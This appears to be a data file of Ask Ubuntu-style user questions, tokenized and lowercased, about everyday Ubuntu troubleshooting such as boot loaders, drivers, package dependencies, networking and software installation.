474815	unable to start gui app from upstart	as part of post-start of my app say `` mydaemon '' , i want to launch a gui app say `` mygui '' . i am unable to do this . i have verified user perm using xhost , display variable is set correctly . conf file in /etc/init/ is given below $ cat /etc/init/agentd.conf description `` my daemon '' author `` me '' start on runlevel [ 2345 ] stop on runlevel [ 016 ] console output kill timeout 60 respawn respawn limit 3 15 # allow some clean up time post-stop script env display=:0.0 cd /home/me ./mygui sleep 1 end script script cd /home/me ./myapp end script post-start script env display=:0.0 cd /home/me ./mygui end script any suggestions ? xserver is up and running before this script is run . i explicitly started the service myapp after verifying lightdm . i also made the suggested changes to the script however the gui does n't seen to come up . any suggestions ?
474816	acronis restore wubi ubuntu 12.04 parition with error	i 'm on win 8.1 , then i download ubuntu-12.04.4-desktop-amd64.iso i mount the iso and copy wubi.exe to the same folder with above iso i run wubi.exe and install to another partition everything works fine , then i make a backup with acronis true image 2013 today , i use acronis to restore that backup , after that i boot into ubuntu and see this error and can see the folder structure of wubi partition from win 8.1 , i copied root.disk to another place how can i fix this ? ( dell 2420 ) edit : i formatted wubi partition in windows , reinstall wubi ( in order to copy root.disk after fresh wubi installation ) at the time it reboots and continues installing ubuntu , there 's a error : no root file system is defined . please correct this from the partitioning menu googling does n't help till now : ( edit # 2 : i fixed it by 2 commands , the acronis restore the wrong path , it should be \ubuntu\winboot\wubildr.mbr , not .exe problem solved http : //www.howtogeek.com/howto/20340/how-to-restore-the-wubi-ubuntu-bootloader/
474819	no sound on ubuntu 14.04	i am completely new to ubuntu . i was n't hearing the notification on skype and started to mess around with the settings.now i dont have any sound at all i started installing and removing packages like pulseaudio and i really do n't know what i have done ? is there a way just to set everything back to default ? please help .
474820	error while installing nokia suite	dependency is not satisfiable gambas2-runtime ( > =1.9.48 ) error while installing nokia suite . what should i do ? i am using ubuntu 13.10 . please recommend me a software application similar to nokia pc suite for connecting my pc through nokia mobile .
474827	please help me fix my screen resolution	i installed ubuntu 14.04 yesterday and the screens resolution is set at 640x480 , so everything is too big . i have gone into display settings and it will not give me and more screen resolution sizes . i am not very good using the terminal so if anybody can help me i would greatly appreciate it : ) im using a asus x58c .
474829	changing current directory to directory that have identifier as the substring	my terminal is currently in the home directory , and the home directory contains a directory which have `` round '' as the substring . is there any way to directly change to that directory without typing the whole name of the directory ? like without executing : cd dir_name or cd identifier why the below command opens the secondary prompt instead of changing the directory cd ls | grep identifier
474830	how can i install dual monitor on intel add2/sdvo 963q express ?	i want to use an add2/sdvo card on a pci express slot like this one : http : //www.intel.com/support/graphics/intel915g/sb/cs-013296.htm i can get drivers created for windows but not for ubuntu . did anyone install an additional monitor on ubuntu ? ( hp 5700 small form factor - intel chipset )
474832	how can a windows application installed via wine be enabled to access partitions other than /home ?	i am fairly new to ubuntu , having only recently switched from windows . as i had a very large number of files stored in several partitions , which i naturally wanted to retain , i deleted only the partition c where windows os was , and manually installed ubuntu 14.04 ( with its 'swap ' , '/root ' and '/home ' ) in that space . now i do quite a bit of video conversion , my desired output formats being xvid , mp3 and -- for container -- avi . since handbrake video converter allows only mkv container , i installed via wine my preferred windows application , mediacoder . i find that this application does convert video files as before ( which means the installation has been correctly done ) but only those from the ubntu '/home ' partition . it can not even detect the other pre-existing partitions , let alone accessing files from them . so my question is : how can a windows-compatible application , installed via wine , be enabled to detect and access partitions that were created earlier by windows ?
474836	how to run genymotion via terminal	so i installed genymotion and i used this website as a guide : https : //cloud.genymotion.com/page/doc/ . unfortunately , when i do the last step it wo n't let me run the application . thank you . this is the error coming up in terminal : ./genymotion bash : ./genymotion : is a directory
474839	bluetooth is disable on ubuntu-14.04	this is probably the duplicate of bluetooth is disable on ubuntu 14.04 but i still could not find the solution . i am also having the same issue . i am struggling like anything to add my device in bluetooth but all it shows as disabled options . is there a way ? i checked all the bluetooth softwares and they are installed correctly in my ubuntu 14.4
474840	lost power during update and now i can not install any packages or even update/repair update	i lost power during and update and now i can not install or update any packages . i 'm currently running ubuntu 14.04 32bit . on terminal i get this message : dpkg : error processing package linux-headers-3.13.0-29 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration dpkg : dependency problems prevent configuration of linux-headers-3.13.0-29-generic : linux-headers-3.13.0-29-generic depends on linux-headers-3.13.0-29 ; however : package linux-headers-3.13.0-29 is not configured yet . dpkg : error processing package linux-headers-3.13.0-29-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . dpkg : dependency problems prevent configuration of linux-headers-generic : linux-headers-generic depends on linux-headers-3.13.0-29-generic ; however : package linux-headers-3.13.0-29-generic is not configured yet . dpkg : error processing package linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : no apport report written because the error message indicates it 's a follow-up error from a previous failure . linux-generic depends on linux-headers-generic ( = 3.13.0.29.35 ) ; however : package linux-headers-generic is not configured yet . dpkg : error processing package linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried configuring it and installing the dependencies but so far not luck .
474842	stuck at gnu grub	i am using ubuntu 14.04 with no other os alongside . normally , when i start the computer , it shows the asus logo first and then go to the ubuntu loading screen and finally to ubuntu home screen . now it shows asus logo first and then shows gnu grub purple screen asking me to choose os ( i 've already mentioned that ubuntu is the only one os i installed in my laptop ) . so i choose ubuntu , hit enter and it goes back to asus logo and to gnu grub screen again . it happens this way again and again and again , in other word , it 's looping . gnu grub version is 2.02 beta2-9 gnu grub version 2.02~beta2-9ubuntu1 ubuntu advanced options for ubuntu memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) above is what the purple screen looks like . i tried the third option memory test . found no error till pass 3 . there are two options in `` advanced options for ubuntu '' ubuntu , with linux 3.13.0-27-generic ubuntu , with linux 3.13.0-27-generic ( recovery mode ) when i hit them , both options show the black terminal-like screen for a second or two and then to asus logo . it is also looping . some say to fix this problem using boot repair . and some say boot repair slow down the reboot process . sorry for long detail question and thank you all ...
474844	is there a terminal in ubuntu that makes a beep/ding sound with every character typed ?	i need a terminal in ubuntu that makes a beep/ding sound with every keystroke . you know , the kind of thing that happens on a mobile phone . every time you press a key , the terminal makes a sound . is something like that available for ubuntu ? really appreciate your help !
474845	multi gateways & vlans	with all your help and support , i’ve managed to configure an ubuntu dhcp server with 2 network cards , and it’s working well . thanks again . my next step is more advanced , it’s to configure another one to serve ip-addresses from 2 different ranges , say 192.168.x.x and 172.20.x.x . the hw i have is a hp-proliant with 3 network cards ( eth0 , eth1 , eth2 ) would like to connect eth0 and eth1 to 2 different vlans ( say 10 ,20 ) , those vlans will act as 2 different gateways ( for the clients to be able to access the internet ) .the third network card / eth2 should act as dhcp and provide the ip addresses . i know how to configure this to provide ips from one range but need to configure it to do the following : 1- if clients connect to e.g . vlans 10 they should get ips from the first range / 192.168.xx and use the first gatewae to the internet ( eth1 ) 2- if clients connect to vlans 20 they should get ips from the second range /172.20xx use the second gatewae to the internet ( eth2 ) is it a matter of configuring the 2 vlans with different ip-ranges in the ubuntu server by using sub interfaces in eth2 ? and how to configure the server to give the right ips depending on which vlans the clients are accessing ? is it a matter of configuring iptables ? could some one please help and provide config examples for this ? many thanks in advanced madona33
474846	how to fix low graphics mode error on reboot	the system is running in low graphics mode i have a fatal issue with my ubuntu 13.10 and i would appreciate any assistance i can have . upon login i 'm presented with `` the system is running in low-graphics mode '' error and when i select ok , the screen goes black with nothing more to do . as i have upgraded my os from 10.04 to 13.10 . i dont have any graphics card in my machine how can i get my environment back .
474850	how to execute 64bit application on 32bit ubuntu system ?	i have downloaded and installed lubuntu latetest 14.10 32bit and now , after downloading z88 aurora software ( only 64bit is available for linux ) , so i followed the installation guide , but the software does n't execute and returns the following message in the terminal : line 5 : ./z88aurora : can not execute binary file : exec format error maybe someone can help me with this and thanks in advance .
474851	broken workspaces problem	selecting a program icon on the unity sidebar wo n't take me to any window sitting on a different workspace , only the ones in the current . can anyone suggest how to fix ?
474857	netstat output meaning	i run netstat -a | grep ftp the result is tcp 0 0 * : ftp * : * listen what is the meaning of this zeros and stars ?
474859	i have a problem with software center	i am using ubuntu 12.04 desktop and before few days software center stopped working . i uninstalled it and reinstalled it but during the final stage it showed me bad marshal data and few other error lines . i have tried the suggested methods in the similar questions asked previously . also sometimes i get system problem and i have sent the report . please let me know what to do .
474862	wifi not working asus x550cc it is hard blocked	hello all i have asus x550cc laptop with ath9k wifi card in which i have a problem with ubuntu 14.04. i can not enable wifi it shows wifi is disabled by wifi switch i tries 'rfkill list all ' command it shows wireless lan hard blocked yes . i have no physical button in my comp for wifi all i know is alt+f2 for enabling disabling wifi pls help .
474866	syncing dm-crypted drives ?	i have 2 usb sticks , 8gb each : usb1 = /dev/sdb usb2 = /dev/sdc usb1 is a full dm-crypted drive and i am currently using usb2 as a backup , just incase usb1 fails . i am cloning usb1 to usb2 using the following command : dd if=/dev/sdb of=/dev/sdc this works as i have tested usb2 and everything seems intact . what i do n't like about this method is that it takes about an hour to run the dd command . once i have cloned usb1 once , is it possible to keep usb1 and usb2 in sync without having to clone the whole drive using dd each time a text file is changed ? can i use something like rsync to sync 2 usb sticks which are fully dm-crypted drives ? i can dd usb1 to usb2 without decrypting usb1 . i 'm hoping a solution exists where i do n't have to decrypt both usb1 and 2 to sync them . i 'm hoping the sync program can figure out the differences at binary level ?
474868	brother dcp-135c on ubuntu - can not change print quality	changing 'print quality ' does n't affect on print quality ; ) printed documents are the same quality no matter what quality i 'm choosing on computer . if i choose `` fast '' it 's the same as `` normal '' or `` fine '' . anyone some ideas ?
474869	lost ubuntu partition after win7 removal	i used to have a 1tb hdd with win7 and ubuntu 12.04 on dual boot . few weeks ago i bought an ssd and installed on dual boot a win7 and ubuntu 12.04 . from the new ubuntu system i was able to access the data in old linux ext4 partition . yesterday i decided to delete the old win7 partition so i formatted the old win7 partition and the 100mb partition reserved file system . now i cant access anymore the old ubuntu partition from the new ubuntu . so i tried to boot from live cd and restore the grub in the hdd . the command fdisk -l give me [ i disconnected the ssd before booting from live cd ] the following output : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 224 heads , 19 sectors/track , 459004 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xea3fb49a device boot start end blocks id system /dev/sda1 2048 307197951 153597952 7 hpfs/ntfs/exfat /dev/sda2 * 307200000 819199999 256000000 7 hpfs/ntfs/exfat /dev/sda3 819202046 1953523711 567160833 5 extended /dev/sda5 1938425856 1953523711 7548928 82 linux swap / solaris the ubuntu partition is sda3 that become tagged as extended after old win7 removal while before was tagged as linux . after that i lauched the command sudo grub-install /dev/sda3 and it gives me /usr/sbin/grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . so i tried with sudo mount /dev/sda3 /mnt and it gives me that ntfs signature is missing . failed to mount '/dev/sda3 ' : invalid argument the device '/dev/sda3 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? i 'm not interested in running this os again i 'm only interested to access the file in that partition from the ubuntu on the ssd .
474870	dual monitor with different applications . ubuntu 14.04	there is a way in ubuntu 14.04 to work with two different screens while the set of applications of each screen is individual , so alt+tab would not show all applications , but only the ones belonging in the specific screen ? thanks .
474872	help with network on ubuntu 14.04	so i have hp laptop where i recently installed ubuntu 14.04 . i 'm in a location where i do n't have a ethernet connection but i have wireless and usb connections from a gadget that basically works like a phone but it only provides 3g/4g internet through wifi and usb . i have another computer that i can use to download files and transfer them to my laptop with ubuntu . so i need help getting wireless network or internet through usb drivers to my laptop with ubuntu 14.04 using my laptop with windows 8.1 . the wireless card i have is broadcom bcm4311 .
474873	mediawiki installation on 14.04	i have followed this guide https : //www.mediawiki.org/wiki/manual : running_mediawiki_on_ubuntu successfully down to the line mysql_secure_installation at which point it prompted me for a password , i entered one and it said : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) then i decided to hit enter as it again prompted me with : enter current password for root ( enter for none ) : and this gave this error : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) . thank you for any help .
474874	lubuntu equivalent for gnome-system-monitor	gnome-system-monitor shows , under resources , three things , namely cpu , memory and network history . is there a lubuntu equivalent which shows me these things ? as far as i 've noticed , lubuntu has task manager but this only shows cpu and memory usages , without any history charts and without any network information .
474877	problems with ubuntu 14.04 dvds , corrupted ?	i 'm trying to install ubuntu 14.04 from dvd , but i keep having problems with them . i have tried with default ubuntu and with ubuntu gnome . in both cases , whenever i try to demo or install ubuntu and even when i try to check the discs for defects it always gets to console mode and , after reaching the same point it stops doing anything . i assume it may be a corrupted dvd in both cases , but considering the probability of two dvds being badly burned in a row , i want to ask first before trashing more dvds just in case . most of the codes consist on lines starting by something like `` [ 9.407262 ] '' . the lines that catch my attention the most are : error : unexpectedly disconnected from boot status daemon pwconv : failed to change the mode of /etc/passwd- to 0600 then it starts saying things about ubuntu 14.04 and then it ends with a line that does not seem to be suspicious , not an error at least : [ 45.060864 ] adding 8282108k swap on /dev/sda2 . priority : -1 extents:1 across:8282108k fs useful information : my pc is an alienware m17x-r4 . i want to install over a previous 14.04 installation that is unbootable . when i try with an old 12.04 live dvd it works perfectly . thanks ! edit : the checksum of , at least , the default ubuntu iso and the burned dvd coincide with the one given by canonical , so , in principle , it is not corrupted .
474878	how to create a startup script for minecraft	i own a vps in which i run various servers from . one of those things is a minecraft server . recently i also installed a teamspeak server following a tutorial . this server however started up automatically on boot and would run even if i did not have an ssh window open running the process . i then attempted to create a similar start up script for my minecraft server . however i could not do it successfully . i looked up the formatting codes and instructions on the official help page , but when i boot up the minecraft server it does not auto start like the team speak server . note : i know screen is an option however i prefer not to use it . the startupscript for team speak was placed in the init.d folder and now runs as long as the server is up despite if i am connected to it or not .
474884	trying to boot ubuntu from a second ssd	my problem is that i can not get my bios to let me change bootorder so i can get my second ssd to be ssd number 2 . i have an hp6751c . are there bios that will not let you select the bootorder ?
474887	how to update kernel after ubuntu server 10 - > 12 update	i have a remote vps which had ubuntu server 10.04 installed ( for some reason the hosting company does n't have 12.04 yet ) i recently downgraded my hardware to a vps from a dedicated machine and transferred the list of installed packages to the new vps after i updated it to 12.04 . the problem is the vps is still running and old kernel , i 've tried updating it but it does n't seem to want to run a newer kernel , i thought it may be a problem with grub so i ran update-grub : found linux image : /boot/vmlinuz-3.8.0-39-generic found initrd image : /boot/initrd.img-3.8.0-39-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found linux image : /boot/vmlinuz-3.8.0-34-generic found initrd image : /boot/initrd.img-3.8.0-34-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found linux image : /boot/vmlinuz-3.5.0-49-generic found initrd image : /boot/initrd.img-3.5.0-49-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found linux image : /boot/vmlinuz-3.2.0-61-generic found initrd image : /boot/initrd.img-3.2.0-61-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found linux image : /boot/vmlinuz-3.2.0-59-generic found initrd image : /boot/initrd.img-3.2.0-59-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found linux image : /boot/vmlinuz-3.2.0-58-generic found initrd image : /boot/initrd.img-3.2.0-58-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found linux image : /boot/vmlinuz-3.2.0-56-generic found initrd image : /boot/initrd.img-3.2.0-56-generic /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . /usr/sbin/grub-probe : error : no such disk . found memtest86+ image : /boot/memtest86+.bin can not find list of partitions ! ( try mounting /sys . ) however as you can see i 'm getting a heap of errors . i 'm not to sure what 's going on .
474890	running downloaded ubuntu on virtualbox is so very slow ? what to do ?	i downloaded virtualbox onto my windows 7 machine after which i successfully downloaded ubuntu v 14 , which i updated to v.15 . however , i find that ubuntu runs very very slowly and that the @ sign does not seem to be recognized . do i have to pay a yearly subscription to get ubuntu to work optimally ? if so to whom ?
474894	need a little help with dconf formatting	simple question which way is correct or is it even really matter to a program , if i edit unity dash lenses with dconf e.g . i want to use only whatever1.scope for default always-search , by default there 's [ 'whatever1.scope'.'whatever2.scope'.'whatever3.scope ' . 'whatever4.scope ' ] so which way should i edit with brackets and quote marks included [ 'whatever1.scope ' ] or just quote marks enough 'whatever1.scope ' ? the same is for disabled .scopes if i only want to disable 'whatever4.scope ' are the quote marks enough or brackets should be included as well ? thanks for help .
474895	how to configure bios settings while installing ps2 emulator	i got this error statement while installing the ps2 emulator it says to configure bios how can i get it done
474898	how do i fix âmalformed lineâ errors in sources.list ?	i have a trouble with malformed line 60 , i tried few things in terminal , but still is there e : the list of sources could not be read . i have ubuntu 13.10 . if you have any idea how , please help , thank you ; - ) .
474900	change date format for wine ( windows software )	when i run a windows software with wine1.6 on ubuntu 14.04 , it asks to change date format to dd/mm/yyyy . now what to do ? how can i change format for this ? this question is not about changing date/time format for showing in indicator .
474903	windows disk manager : how to remove the partition created by ubuntu installation ?	i was trying to install ubuntu 14.04 ( dual boot with windows 7 ) . but the installation failed due to a hard drive problem . now in windows disk manager there are three primary partitions . c belongs to windows 7 and last 2 created during installation process . i want to delete the last 2 partitions . i want to know , if i delete them , will it affect the windows boot loader ?
474904	ubuntu 14.04 boot error on windows 8.1 - syslinux 4.07 edd	i want to replace windows 8.1 that came with my laptop with ubuntu 14.04 . i keep getting a black screen with this line : syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al things i did before : turned off fast boot disabled secure boot switched to legacy instead of uefi ( even though a tutorial i found said this is n't really needed anymore , i still did anyway because i read it from the laptop 's user guide : `` if you need to install a legacy operating system , such as windows ( that is , any operating system before windows 8 ) , linux or dos , etc on your computer , you must change the boot mode to legacy support . '' i chose to load from usb . and then that syslinux 4.77 edd ... . appears i tried to install using the same usb on an old lenovo s10-3 . it worked . though that s10-3 runs lubuntu . still it 's probably safe to say that it 's not the usb that has problems , right ? thanks for any help . i ca n't wait to have ubuntu : ) edit : this might be useful info . the usb is 16gb x-stor fat32 . i used yumi .
474905	ubuntu wo n't start after updating nvidia drivers from x-swat ppa	i tried to update the nvidia drivers using : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current after this , i rebooted my pc , launch ubuntu , then i can see that it 's loading everything ( as usual ) , but then i end up with a black screen and a flashing underscore . ( i tried to load the terminal at this point using ctrl + alt + f1 , but that does n't work ) my videocard model is gt650m how can i fix this ?
474910	run scripts in background in tty	there are quite a few questions asking what you can do to run a shell script in the background while not running the terminal . most have advised to use nohup or disown . this might be a stupid question , but i am new to linux and ubuntu , but can anyone explain to me why not just press ctrl + alt + 1 ... 6 to open a tty ( teletype terminal ) and run the script appended with a & ? then i can just choose another tty or the gui to carry on whatever i am doing . i read here that i can even more ttys ( although the answer does not tell me how ) what are the pro 's and con 's of this approach over the 'commonly-accepted ' ( in se it seems at least )
474911	running openstack on 3 nodes	is it possible to run the openstack cloud over 3 nodes ( initially , with a further node to follow at a later date ) ? the servers are all quad core xeon , 12gb ram and 2x1tb disks . i am currently looking at virtualising a very small network , however we do not have the money or facilities to sustain the advertised minimum of 6 servers to run openstack . also , money is a limit as this is for a not for profit organisation . i would rather run openstack than vmware as it means it will operate as a cluster , unlike esxi which will not . source : http : //www.ubuntu.com/download/cloud/install-ubuntu-cloud - step 4
474912	after i installed 14.04 desktop , launcher on left side is missing after virtualbox 4.3.12 upgrade	exactly same issue as the main post but the solutions given in that post did n't solve the issue . i was working with virtualbox 4.3.10 in windows 8 with ubuntu 14.04 as guest . once i upgraded to virtualbox 4.3.12 , then suddenly launcher and taskbar is missing . no terminal working . please note , i have tried the options in the main post . so this seems to be another kind of issue .
474915	can not boot to ubuntu after windows 7 installation and `` boot-repair '' does not work	i hope someone here can help me : i re-installed my windows 7 partition and now i can not boot to ubuntu 14.04 any more - no grub boot-menu is display instead directly the `` loading windows '' screen is shown . if i go to the boot menu in bios i can select my ubuntu - drive and boot from it ( which is quite cumbersome ) . so i tried to use `` boot-repair '' as described at at the help pages but the program exits with an error . this is the link i get from `` boot-repair '' : http : //paste.ubuntu.com/7558812/
474920	why are the fglrx drivers not up to date ?	i have a amd radeon hd 8750m dedicated graphics card and ubuntu 14.04 , so from software updater i installed fglrx-updates , how ever after doing a dmesg | grep fglrx i found out that the version is from mar 12 2014 . but on the official amd website the latest version is from 5/27/2014 . why is that version not on the ubuntu repos since it supports ubuntu 14.04
474927	flash ubuntu touch	so i recently factory reset my nexus 7 tablet and i want to get ubuntu touch on it . before factory reset i had it , but since originally flashing my nexus 7 i got a new laptop and got ubuntu installed . now i 'm having a problem . i 'm following the tutorial found here , but i 'm having a problem when i use the line : sudo apt-get install ubuntu-device-flash it says that the device package can not be found . is this a problem with my os ( i 'm running 13.04 ) or did the packages get taken down ? thanks !
474928	yet another hibernate problem : save to disk work , but can not wake up	for the past 3 weeks i 've been working on setting up an old hp pavillon a1540n with ubuntu server 14.04 . main problem is the hibernate/suspend process . i 've done a lot of reading and made great progress thus far , but i feel i reached a point where google is n't helping anymore . right now , pm-hibernate saves to disk correctly , computer stops making sounds , but the screen shows a blinking cursor . after that , no event can wake it up and i have to force shutdown by pressing and holding the power button . on restart however , it loads perfectly and resume where i left . this leaves me thinking that somehow no events can wake it up . here is a short list of any effective actions i 've done that i can think of : -removed graphics card and tv tuner card -updated bios to 5.07 ( no new option for power management though , but it helped ) -updated driver to nvidia 330 ( latest recommended ) doing basic pm-debugging ( basic-pm-debugging.txt # 178 on mjmwired dot net ) , using reboot works fine but using platforms create the same problem as pm-hibernate . pastebins : dmesg : http : //pastebin.com/b1kpb4gi pm-suspend.log : http : //pastebin.com/5wagrfgr /proc/acpi/wakeup : had to paste it here , askubuntu says i 'm not trusty enough to paste more than two links : ( device s-state status sysfs node hub0 s5 *disabled pci:0000:00:10.0 xvra s5 *disabled pci:0000:00:04.0 xvrb s5 *disabled xvrc s5 *disabled pci:0000:00:02.0 usb0 s3 *enabled pci:0000:00:0b.0 usb2 s3 *enabled pci:0000:00:0b.1 azad s5 *disabled mmac s5 *enabled pci:0000:00:14.0 mmci s5 *disabled ps2m s4 *disabled pnp:00:07 ps2k s4 *enabled pnp:00:08 thanks
474929	why are lines with man and news underlined in the terminal ?	so i ran the command less < /etc/passwd in the terminal , and the /etc/passwd file is displayed . when i move my cursor over some of the lines ( namely the lines beginning with man and news ) were underlined . typically , i though this was a link , but clicking or double-clicking on it does n't do anything . so why are some of these lines underlined on mouse-over ?
474930	bcm4352 wireless network card issues with lubuntu 14.04 lts	just got a new laptop with windows 8 on which i installed lubuntu , but lubuntu does not recognize my broadcom corporation bcm4352 wireless network adapter . i googled the web and went through a couple of tutorials but nothing seems to work . i think before i try anything else i need to remove all the things that i installed from the tutorials i went through ( dkms , bcmwl-kernel-source-dw1550.deb , bt-dw1550-firmware_0.1.all.deb , etc . ) is there a way i can uninstall everything i installed after lubuntu ? in other word , is there a way to revert-to-default post installation state ?
474932	help : i broke ubuntu by uninstalling compiz	i 'm still getting used to linux , having come from windows . i was receiving an error that `` compiz '' had crashed a few times so i figured i 'd uninstall it . sudo apt-get remove compiz sudo apt-get install compiz i logged out then back in , after that , the gui was totally gone and i have no idea how to get it back or what i need to do to restore the gui to what it was before i killed poor compiz . gui was pretty much unmodified after a fresh install of 14.04 how can i fix it ? i 'm not even sure how to get to a terminal or anything . the login screen looks normal , but after logging in , it 's a totally bare desktop with my backround and a few icons . no dash , toolbar , etc . hot keys do n't seem to work either ( super = dash does n't work , etc ) ; although i did accidently open `` disk '' ui . not sure how . please help ! right now i 'm working off my w7 dualboot . [ [ solved ] ] thanks @ laugeo and @ todo , you both helped out . here 's what i did ... booted into ubuntu with my broken desktop ctrl+alt+f1 to open virtual terminal sudo install gnome-session-flashback reboot launch session with flashback ( compiz ) launch terminal and type apt-get install ubuntu-desktop reboot back up and running ultimately i suppose steps 3-5 were n't necessary , but they allowed me to get to a functional desktop and then i did more searching and found 'ubuntu-desktop ' to install thanks for your help guys !
474933	need help with amd catalyst control center	i just built my first htpc and i hooked it up to my sony kds-r60xbr1 and i am having display issues . i believe this is only a 1080i display and when i select 1920x1080 on the resolution i get strange lines on the display when anything moves on screen . i am guessing this is because it is putting it in 1080p and the tv can not process that . as of now i have lowered the resolution and that worked but i would like to get this set at 1080 . also i can not change the underscan . i am stuck with black borders around the display image . when i pull up the catalyst control center on my computer i am able to adjust all of this stuff but on the one on my htpc with the tv display i have no options . see images below .
474937	problem compiling a c file	i was trying to install xmame 0.103 on ubuntu 14.04 . i had some problems installing it . it says that *.c zlib.h : no such file or directory i opened that file and i saw that zlib.h file was written in header section . i tried some packages regarding it but all in vain . what can i do to solve this problem ?
474939	how to connect two ubuntu computers with ethernet cable	i 'm trying to connect with ethernet cable two computers - desktop and laptop . what i want to do is transfer a lot of data from one to another . the problem is that i 'm doing everything from : how to network two ubuntu computers using ethernet ( without a router ) ? but after that , ping always gives me `` destination host unreachable '' . i was searching a while but could n't figure out what is a reason it does n't work , maybe it 's something about my devices or maybe someone will have another idea . ethernet cable i got with my router . there is a text printed on it : aurit data cable cat.5 utp 26awg 4pair awm puc 75째c eia/tia 568b it 's connecting now my desktop to router , so i can send this question . my desktop : system : ubuntu 12.04 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) '' ethtool -i eth0 '' output : driver : r8169 version : 2.3lk-napi firmware-version : rtl_nic/rtl8168d-1.fw bus-info : 0000:01:00.0 supports-statistics : yes supports-test : no supports-eeprom-access : no supports-register-dump : yes my laptop : system : ubuntu 14.04 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 08 ) '' ethtool -i eth0 '' output : driver : alx version : firmware-version : bus-info : 0000:01:00.0 supports-statistics : no supports-test : no supports-eeprom-access : no supports-register-dump : no supports-priv-flags : no my iptables are accepting everything . any ideas why i can not reach other computer ? added # 1 : output of `` ifconfig eth0 '' for my desktop : eth0 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :225:22ff : fe55:825b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1039975 errors:0 dropped:0 overruns:0 frame:0 tx packets:590190 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1377007362 ( 1.3 gb ) tx bytes:54584349 ( 54.5 mb ) interrupt:43 base address:0xa000 output of `` ifconfig eth0 '' for my laptop : eth0 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:192.168.2.1 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :de0e : a1ff : fef3:676/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16
474943	ubuntu disappeared after upgrade !	i just wanted to upgrade my 12.04 lts version to 12.10 . after the upgrade and restarting i encounter just a black page with no messages and nothing ! does anyone have an idea about the reasons of this problem and how to repair it ?
474944	can not install teamviewer_linux.deb package on linux 64bit	i wanted to install teamviewer on linux 64-bit system . what i did was to download teamviewer.deb file and install it as below : sudo dpkg -i install teamviewer.deb then i wanted to correct dependency problem so i issued the following command : sudo apt-get install libc6 : i386 libgcc1 : i386 libasound2 : i386 libfreetype6 : i386 zlib1g : i386 libsm6 : i386 libxdamage1 : i386 libxext6 : i386 libxfixes3 : i386 libxrender1 : i386 libxtst6 : i386 i got the following error : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies i then tried : sudo apt-get install -f again i got the following error : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies even i tried to install gdebi , but i got the above error again . i emptied archives folder : sudo apt-get clean sudo apt-get update sudo apt-get upgrade again i have problem installing my deb package . is there anything i could do now to solve this problem ? i 've read the below article as well : install teamviewer using a 64-bits system but i get a dependency error edit : i found libperl5.14 : amd64 as a broken package . i used : sudo apt-get remove libperl5.14 : amd64 i got the following message : e : unable to locate package broken this is my whole apt.log file . i found a few more broken packages . i 've done the same thing and got the same message . edit 2 : i tried to install teamviewer_linux.deb via software center and i found repair button i clicked it and again i got the error below : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . even after package removal and installing it via software center i got the error below : can not install 'libfreetype6 : i386 ' edit 3 : can sources.list affect the process of installing deb packages ? this is the only thing i 'm suspicious of ! edit 4 : when after that i type sudo apt-get install -f i get this message : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 18 not upgraded edit 5 : output of sudo dpkg -i teamviewer_linux.deb : dpkg : error processing package teamviewer ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : teamviewer
474948	keyboard shortcut not appearing in keyboard	i 'm trying to play minecraft ( a video game ) that makes use of f3 . however , i 'm on a laptop which requires you to hold down fn in order for a f # key to be registered . the problem is that ubuntu registers fn+f3 as the lock keyboard shortcut . how can i turn this behavior off ? thanks in advance ! also , the shortcut is n't appearing in keyboard . - snuggles08
